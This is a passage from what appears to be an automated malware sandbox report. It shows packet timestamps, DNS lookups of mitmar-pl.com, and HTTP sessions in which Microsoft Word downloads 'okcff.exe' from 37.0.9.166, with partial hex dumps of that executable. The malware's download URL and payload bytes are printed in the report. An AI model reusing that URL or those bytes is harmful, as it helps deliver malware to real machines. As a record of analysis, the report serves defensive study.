                                                          Jan 14, 2022 10:23:27.298582077 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298599958 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298605919 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298607111 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298610926 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298629045 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298652887 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298670053 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298691988 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298710108 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298718929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298742056 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298763037 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298775911 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298785925 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298809052 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298829079 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298830986 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298835993 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298860073 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298882961 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298906088 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298927069 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298930883 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298940897 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298949957 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.298962116 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.298973083 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299001932 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299019098 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299031019 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299053907 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299076080 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299081087 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299098969 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299122095 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299139977 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299143076 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299166918 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299200058 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299216986 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299223900 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299235106 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299267054 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299272060 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299298048 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299328089 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299343109 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299350977 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299374104 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299396038 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299424887 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299441099 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299455881 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299472094 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299490929 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299501896 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299508095 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299515963 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299539089 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299561024 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299591064 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299612999 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299638033 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299654961 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299675941 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299678087 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.299683094 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299686909 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.299721956 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326488018 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326512098 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326529026 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326543093 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326558113 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326572895 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326589108 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326600075 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326606035 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326617002 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326632023 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326646090 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326661110 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326662064 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326666117 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326677084 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326692104 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326706886 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326720953 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326733112 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326738119 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326738119 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326755047 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326769114 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326771021 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326788902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326798916 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326813936 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326828003 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326831102 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326843977 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326858997 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326879025 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326900005 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326904058 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326915026 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326917887 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.326931000 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326950073 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326963902 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326978922 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.326992989 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327007055 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327022076 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327033043 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327035904 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327038050 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.327047110 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327061892 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327111959 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:27.327153921 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.328083992 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:27.328100920 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:33.079349041 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:33.079515934 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:42.243078947 CET804917037.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:42.243217945 CET4917080192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:24:27.296951056 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:24:48.884532928 CET4917080192.168.2.2237.0.9.166

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2022 10:23:17.920835972 CET5216753192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:17.952476025 CET53521678.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:22.426112890 CET5059153192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:22.446824074 CET53505918.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:23.372718096 CET5780553192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:23.440036058 CET53578058.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:26.991931915 CET5903053192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:27.011117935 CET53590308.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Jan 14, 2022 10:23:17.920835972 CET192.168.2.228.8.8.80xf90Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:22.426112890 CET192.168.2.228.8.8.80x8b50Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:23.372718096 CET192.168.2.228.8.8.80x8fdeStandard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:26.991931915 CET192.168.2.228.8.8.80x11d5Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Jan 14, 2022 10:23:17.952476025 CET8.8.8.8192.168.2.220xf90No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:22.446824074 CET8.8.8.8192.168.2.220x8b50No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:23.440036058 CET8.8.8.8192.168.2.220x8fdeNo error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:27.011117935 CET8.8.8.8192.168.2.220x11d5No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • mitmar-pl.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.224916737.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:17.996404886 CET0OUTGET /okcff.exe HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:18.024344921 CET2INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:18 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o
                                                          Jan 14, 2022 10:23:18.024382114 CET3INData Raw: 06 00 00 0a 38 1f 00 00 00 38 1b 00 00 00 20 01 00 00 00 7e 65 00 00 04 3a ad ff ff ff 26 20 00 00 00 00 38 a2 ff ff ff 00 dc 38 8c 02 00 00 11 03 11 1d 16 11 1d 8e 69 6f 04 00 00 0a 20 1c 00 00 00 7e 48 00 00 04 3a 0f fe ff ff 26 20 0b 00 00 00
                                                          Data Ascii: 88 ~e:& 88io ~H:& 88W 8o(/8a88\ 8: 8r'p( ~:& 8r=p.((8E
                                                          Jan 14, 2022 10:23:18.024405003 CET4INData Raw: 00 00 38 13 ff ff ff 11 12 6f 10 00 00 0a 72 54 01 00 70 28 13 00 00 06 13 13 20 00 00 00 00 7e 2b 00 00 04 3a f1 fe ff ff 26 20 00 00 00 00 38 e6 fe ff ff 00 00 28 11 00 00 0a 72 72 01 00 70 11 2e 72 7c 01 00 70 28 11 00 00 06 6f 12 00 00 0a 13
                                                          Data Ascii: 8orTp( ~+:& 8(rrp.r|p(o ~q9& 8E8(rrp.rp((8`&8S8N1X181 ~"9C& 88) ~q
                                                          Jan 14, 2022 10:23:18.024426937 CET6INData Raw: 38 73 f8 ff ff 73 28 00 00 0a 13 03 20 18 00 00 00 7e 4f 00 00 04 39 cc f3 ff ff 26 20 0c 00 00 00 38 c1 f3 ff ff 00 00 00 41 dc 00 00 00 00 00 00 46 03 00 00 17 00 00 00 5d 03 00 00 0d 00 00 00 01 00 00 01 00 00 00 00 6e 0a 00 00 19 00 00 00 87
                                                          Data Ascii: 8ss( ~O9& 8AF]n&rorp'A\d3
                                                          Jan 14, 2022 10:23:18.024451971 CET7INData Raw: 00 00 44 05 00 00 41 0b 00 00 46 03 00 00 4f 0f 00 00 b2 07 00 00 82 02 00 00 bb 0b 00 00 ff 0a 00 00 59 01 00 00 0a 03 00 00 95 0d 00 00 5e 04 00 00 96 03 00 00 33 0a 00 00 86 00 00 00 a2 0e 00 00 21 0e 00 00 ee 07 00 00 d8 09 00 00 9d 08 00 00
                                                          Data Ascii: DAFOY^3!jBh7L"Key4=-jH.
                                                          Jan 14, 2022 10:23:18.024475098 CET9INData Raw: 2d 44 77 0a 59 20 f8 70 1b 94 61 80 41 00 00 04 20 05 00 00 00 28 36 00 00 06 39 90 fa ff ff 26 20 09 00 00 00 38 85 fa ff ff 20 ce 7f 90 96 66 20 4a 97 9f 2f 61 20 7b 17 f0 46 61 80 1b 00 00 04 38 9a 05 00 00 20 5b eb 9c 4e 20 04 97 7d 4c 61 20
                                                          Data Ascii: -DwY paA (69& 8 f J/a {Fa8 [N }La _|a) B(79D& 89 7f3 NjX -DwY pa\ (7:& &8 +7Q |WX taD89 T$lf -Wac A8 Qt j"Fta a
                                                          Jan 14, 2022 10:23:18.024492979 CET10INData Raw: 59 20 05 00 00 00 63 20 5a 22 07 03 61 80 35 00 00 04 20 31 00 00 00 38 59 f5 ff ff 20 8e 15 6e 76 20 02 00 00 00 62 20 04 00 00 00 63 20 63 85 9b fd 61 80 57 00 00 04 20 34 00 00 00 38 33 f5 ff ff 20 e0 68 76 c7 20 01 00 00 00 62 20 f2 b5 f2 cb
                                                          Data Ascii: Y c Z"a5 18Y nv b c caW 483 hv b a* 8 q] c 8ya !8 . ;6Y Qat '8 Xo+J b `(a 8 WSe zhaE F8 W -(qa c
                                                          Jan 14, 2022 10:23:18.024511099 CET11INData Raw: 20 03 00 00 00 62 20 91 a8 65 8e 61 80 3b 00 00 04 38 2f f2 ff ff 20 24 08 24 c9 20 04 00 00 00 63 20 82 40 92 fc 61 80 2b 00 00 04 20 2c 00 00 00 38 05 f0 ff ff 20 54 24 6c c8 66 20 ab db 93 37 61 80 4f 00 00 04 38 ee fe ff ff 20 e5 bb 06 c9 20
                                                          Data Ascii: b ea;8/ $$ c @a+ ,8 T$lf 7aO8 b (5Ha /(6:& 8 3 1Y c Z"a 38 .`zf c (ad +8x Oe ,z<Y 9^aT8(4*&~z*
                                                          Jan 14, 2022 10:23:18.024666071 CET13INData Raw: 02 13 00 95 11 69 02 13 00 b8 11 69 02 13 00 db 11 69 02 13 00 fe 11 69 02 13 00 21 12 69 02 13 00 44 12 69 02 13 00 67 12 69 02 13 00 8a 12 69 02 13 00 ad 12 69 02 13 00 d0 12 69 02 13 00 f3 12 69 02 13 00 16 13 69 02 13 00 39 13 69 02 13 00 5c
                                                          Data Ascii: iiii!iDigiiiiii9i\iiiiii.iQitiiiii#iFiiiiiiii;i^iiiii
                                                          Jan 14, 2022 10:23:18.024691105 CET14INData Raw: 04 22 01 39 01 a4 04 29 01 39 01 ab 04 30 01 01 01 b7 04 c7 00 21 00 c5 02 35 01 71 00 c0 04 ad 00 79 00 ca 04 3c 01 a9 00 bd 03 41 01 49 00 e7 04 4c 01 39 01 f9 04 d8 00 51 01 bd 03 93 00 09 00 bd 03 93 00 e9 00 26 05 55 01 71 00 47 05 5a 01 21
                                                          Data Ascii: "9)90!5qy<AIL9Q&UqGZ!ql99I}6W}!"A><g9aai y[
                                                          Jan 14, 2022 10:23:18.051234007 CET16INData Raw: 4b 65 79 73 00 4b 65 79 73 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6f 6e 63 61 74 00 73 65 74 5f 4b 65 65 70 41 6c 69 76 65 00 53 65 72 76 69 63 65 50 6f 69 6e 74 4d 61 6e 61 67 65 72 00 73 65 74 5f 53 65 63 75 72 69 74 79 50 72 6f 74 6f 63 6f 6c 00
                                                          Data Ascii: KeysKeysCollectionConcatset_KeepAliveServicePointManagerset_SecurityProtocolSecurityProtocolTypeget_LengthCloseReadProcessSystem.Diagnosticsget_MainWindowHandleIntPtrGetMethodsMemberInfoget_NameEncodingSystem.Textget_ASCIIG


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.224916837.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:22.518182993 CET206OUTGET /okcff.exe HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:22.545969963 CET207INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:22 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 